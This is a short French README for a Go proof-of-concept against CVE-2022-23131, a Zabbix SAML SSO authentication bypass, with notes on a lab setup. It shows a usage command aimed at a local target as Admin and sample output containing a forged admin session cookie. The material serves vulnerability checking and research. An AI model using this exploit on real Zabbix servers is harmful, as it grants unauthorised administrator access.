
Preuve de concept d'exploit pour CVE-2022-23131, une vulnérabilité de contournement d'authentification SSO SAML Zabbix. Inclut la configuration de l'environnement et un vérificateur basé sur Go pour vérifier l'exposition de la cible.
Environnement et Poc de CVE-2022-23131
Vous pouvez créer un Zabbix avec SAML SSO en suivant les étapes dans Environnement Zabbix pour CVE-2022-23131.
Le Poc a été modifié à partir de jweny
Utilisation :
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9